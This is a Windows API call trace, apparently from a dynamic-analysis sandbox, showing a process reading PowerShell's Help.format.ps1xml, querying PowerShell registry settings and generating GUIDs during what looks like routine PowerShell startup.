	[0629.114] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0629.114] GetFileType (hFile=0x2fc) returned 0x1
	[0629.114] SetErrorMode (uMode=0x1) returned 0x1
	[0629.114] GetFileType (hFile=0x2fc) returned 0x1
	[0629.114] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.117] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.117] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.117] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.117] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.118] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.118] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.118] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.119] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.119] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.119] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.119] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.120] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.120] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.120] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.120] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.123] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.123] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.123] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.124] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.124] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.125] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.125] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.126] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.126] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.126] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.127] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.127] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.127] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.128] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.128] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.128] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.135] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.136] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.136] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.136] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.137] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.137] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.137] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.139] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.139] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.139] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.139] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.140] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.140] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.140] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.141] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.141] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.141] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.141] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.143] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.143] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.143] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0xf37, lpOverlapped=0x0) returned 1
	[0629.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x3468b0f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3468b0f*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0629.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x3469470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3469470*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0629.145] CloseHandle (hObject=0x2fc) returned 1
	[0629.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.145] SetErrorMode (uMode=0x1) returned 0x1
	[0629.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0629.146] SetErrorMode (uMode=0x1) returned 0x1
	[0629.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0629.146] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0629.146] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0629.146] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0629.146] CoTaskMemFree (pv=0x4de240) 
	[0629.146] RegCloseKey (hKey=0x2fc) returned 0x0
	[0629.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.180] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xb9ac442, Data2=0xe5f1, Data3=0x4f5e, Data4=([0]=0x92, [1]=0x20, [2]=0x87, [3]=0xed, [4]=0x23, [5]=0x4f, [6]=0x5e, [7]=0x4a))) returned 0x0
	[0629.181] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x6b2a317e, Data2=0xea5d, Data3=0x4701, Data4=([0]=0x93, [1]=0x1b, [2]=0xfc, [3]=0xa7, [4]=0x23, [5]=0x4a, [6]=0xe9, [7]=0xd0))) returned 0x0
	[0629.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0629.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0629.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0629.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0629.224] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xf50cd6ec, Data2=0xac19, Data3=0x48c4, Data4=([0]=0x9b, [1]=0x26, [2]=0xb5, [3]=0x98, [4]=0x85, [5]=0x4b, [6]=0x93, [7]=0x7d))) returned 0x0
	[0629.227] VirtualQuery (in: lpAddress=0x24b2c0, lpBuffer=0x24c180, dwLength=0x30 | out: lpBuffer=0x24c180*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0629.228] VirtualQuery (in: lpAddress=0x24b350, lpBuffer=0x24c210, dwLength=0x30 | out: lpBuffer=0x24c210*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0629.237] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc70c1524, Data2=0xf257, Data3=0x4287, Data4=([0]=0xac, [1]=0xb0, [2]=0x45, [3]=0x23, [4]=0xda, [5]=0xee, [6]=0xe5, [7]=0x9f))) returned 0x0
	[0629.247] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xacef17d8, Data2=0x1c72, Data3=0x48f3, Data4=([0]=0xb2, [1]=0xe3, [2]=0x22, [3]=0xce, [4]=0x38, [5]=0x48, [6]=0xc5, [7]=0x2d))) returned 0x0
	[0629.248] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8d74f64c, Data2=0x6158, Data3=0x4bfb, Data4=([0]=0xa9, [1]=0x7b, [2]=0x15, [3]=0x64, [4]=0x52, [5]=0x62, [6]=0x47, [7]=0xe3))) returned 0x0
	[0629.270] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x3cf62c1f, Data2=0x3b27, Data3=0x4db7, Data4=([0]=0xb3, [1]=0x3f, [2]=0x34, [3]=0x2b, [4]=0x2c, [5]=0xc9, [6]=0x5, [7]=0x2c))) returned 0x0
	[0629.285] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x525c8763, Data2=0xdb7, Data3=0x42eb, Data4=([0]=0x86, [1]=0xc7, [2]=0xda, [3]=0xe5, [4]=0xa6, [5]=0xff, [6]=0x9e, [7]=0x9d))) returned 0x0
	[0629.287] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xdd88b14a, Data2=0x2b1, Data3=0x4f95, Data4=([0]=0x8f, [1]=0xcd, [2]=0x8a, [3]=0x5c, [4]=0x79, [5]=0x9, [6]=0xfa, [7]=0x30))) returned 0x0
	[0629.287] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x572cfc4, Data2=0xad24, Data3=0x4604, Data4=([0]=0x96, [1]=0x7a, [2]=0x97, [3]=0xb8, [4]=0xb4, [5]=0xc0, [6]=0x48, [7]=0x70))) returned 0x0
	[0629.288] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8fb457e4, Data2=0x8792, Data3=0x43a3, Data4=([0]=0xa5, [1]=0xae, [2]=0x5b, [3]=0xa7, [4]=0xe1, [5]=0xc4, [6]=0xa2, [7]=0x36))) returned 0x0
	[0629.289] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa7ea3a9c, Data2=0x8f18, Data3=0x45ab, Data4=([0]=0x9b, [1]=0xd7, [2]=0x1e, [3]=0x7b, [4]=0x29, [5]=0xb9, [6]=0x8e, [7]=0x15))) returned 0x0
	[0629.290] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x17865503, Data2=0x644e, Data3=0x4f65, Data4=([0]=0x8d, [1]=0xc5, [2]=0xfa, [3]=0x39, [4]=0xc7, [5]=0x74, [6]=0xa5, [7]=0x1b))) returned 0x0
